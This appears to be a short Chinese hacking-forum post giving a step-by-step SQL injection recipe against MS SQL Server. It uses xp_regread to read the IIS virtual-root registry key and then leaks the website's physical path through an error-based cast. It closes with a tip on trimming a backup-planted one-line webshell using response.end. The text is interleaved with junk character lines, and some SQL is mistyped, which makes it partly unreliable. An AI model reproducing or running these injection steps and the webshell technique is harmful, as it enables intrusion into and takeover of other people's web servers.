DB权限暴出网站物理路径代码

admin

1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表

) D5 Y! J  O9 ~. n: f
( \# z, ]1 I9 L8 i3 ]1 q# T, L　　2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中
, s' X7 {2 a5 o" ?' A7 X$ {9 u
- ~: [0 z% F/ D' ?/ r
　　3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段
$ _# |* ~  I, @5 R# \3 g6 _" j
5 J, l9 i9 d5 ?3 x
& a  d0 j8 r3 r　　4、drop table [jm_tmp]-- 删除此表。

% D7 G$ O5 H" {* t2 G% n: U
另附上备分专用一句话
. V2 g' r  h/ l; d! s1 w　　加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.